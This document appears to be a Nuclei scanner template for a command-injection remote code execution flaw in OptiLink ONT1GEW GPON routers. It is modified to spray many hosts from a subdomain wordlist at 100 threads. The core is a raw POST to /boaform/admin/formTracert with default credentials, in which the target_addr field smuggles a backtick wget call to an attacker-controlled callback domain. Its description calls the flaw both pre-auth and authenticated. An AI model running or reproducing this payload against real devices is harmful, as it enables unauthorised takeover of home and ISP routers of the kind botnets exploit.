id: optilink-ont1gew-gpon-rce

info:
  name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
  author: gy741
  severity: critical
  description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
  reference: |
    - https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
    - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
  tags: optiLink,rce,oob

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /boaform/admin/formTracert HTTP/1.1
        Host: {{Subdomains}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Content-Type: application/x-www-form-urlencoded
        Origin: http://{{Subdomains}}
        Connection: keep-alive
        Referer: http://{{Subdomains}}/diag_ping_admin_en.asp
        Upgrade-Insecure-Requests: 1
        User: e8c
        Password: e8c
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

        target_addr="1.1.1.1+`wget+http%3A%2F%2F{{Host}}.{{Port}}.{{Subdomains}}.optiLink.{{MY-DOMAIN}}%2F`"&waninf=127.0.0.1"